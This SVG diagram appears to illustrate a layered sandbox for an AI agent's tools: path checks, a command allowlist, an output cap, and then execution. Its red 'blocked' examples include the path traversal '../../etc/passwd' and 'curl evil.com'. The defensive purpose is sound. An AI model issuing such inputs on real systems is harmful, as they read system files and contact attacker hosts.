| <svg viewBox="0 0 720 380" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Layered sandbox: each ring rejects a class of unsafe operations before tools run."> |
| <defs> |
| <style> |
| text { font-family: 'JetBrains Mono', 'Fira Code', 'SF Mono', Consolas, monospace; } |
| .title { font-size: 14px; fill: #c9d1d9; font-weight: 700; } |
| .layer { font-size: 12px; fill: #c9d1d9; font-weight: 700; } |
| .dim { font-size: 10px; fill: #8b949e; } |
| .ok { font-size: 11px; fill: #3fb950; font-weight: 700; } |
| .deny { font-size: 11px; fill: #f85149; font-weight: 700; } |
| .ring1 { fill: #161b22; stroke: #30363d; stroke-width: 1; } |
| .ring2 { fill: #1c2128; stroke: #30363d; stroke-width: 1; } |
| .ring3 { fill: #21262d; stroke: #30363d; stroke-width: 1; } |
| .ring4 { fill: #1f2937; stroke: #58a6ff; stroke-width: 1.5; } |
| .denyline { stroke: #f85149; stroke-width: 1.5; fill: none; stroke-dasharray: 4 3; } |
| .okline { stroke: #3fb950; stroke-width: 1.5; fill: none; } |
| </style> |
| <marker id="dx" markerWidth="9" markerHeight="9" refX="7" refY="4" orient="auto"> |
| <path d="M0,0 L8,4 L0,8 z" fill="#f85149"/> |
| </marker> |
| <marker id="ok" markerWidth="9" markerHeight="9" refX="7" refY="4" orient="auto"> |
| <path d="M0,0 L8,4 L0,8 z" fill="#3fb950"/> |
| </marker> |
| </defs> |
|
|
| <rect width="720" height="380" fill="#0d1117"/> |
|
|
| <text x="30" y="32" class="title">Layered sandbox</text> |
| <text x="30" y="50" class="dim">Each ring blocks a different class of unsafe call before it ever reaches the OS.</text> |
|
|
| |
| <rect class="ring1" x="200" y="80" width="360" height="270" rx="10"/> |
| <text x="218" y="100" class="layer">Workspace boundary</text> |
| <text x="218" y="116" class="dim">safe_path() rejects ../ and absolute paths</text> |
|
|
| <rect class="ring2" x="240" y="135" width="280" height="200" rx="8"/> |
| <text x="258" y="155" class="layer">Command allowlist</text> |
| <text x="258" y="170" class="dim">exec_cmd: only ls, cat, rg, …</text> |
|
|
| <rect class="ring3" x="280" y="190" width="200" height="125" rx="6"/> |
| <text x="298" y="210" class="layer">Output cap</text> |
| <text x="298" y="225" class="dim">clip(result, MAX_CHARS)</text> |
|
|
| <rect class="ring4" x="320" y="240" width="120" height="60" rx="6"/> |
| <text x="345" y="265" class="layer">Tool runs</text> |
| <text x="338" y="282" class="dim">exec(code, …)</text> |
|
|
| |
| <text x="30" y="100" class="deny">../../etc/passwd</text> |
| <path d="M 30 110 L 196 145" class="denyline" marker-end="url(#dx)"/> |
|
|
| <text x="30" y="170" class="deny">curl evil.com</text> |
| <path d="M 30 175 L 236 200" class="denyline" marker-end="url(#dx)"/> |
|
|
| <text x="30" y="240" class="deny">read 999999 chars</text> |
| <path d="M 30 245 L 276 245" class="denyline" marker-end="url(#dx)"/> |
|
|
| |
| <text x="600" y="100" class="ok">read_file("README.md")</text> |
| <path d="M 690 110 C 600 130 500 200 442 268" class="okline" marker-end="url(#ok)"/> |
|
|
| |
| <text x="30" y="350" class="dim">red = blocked at the first ring it violates · green = passes every ring and reaches the tool</text> |
| </svg> |
|
|
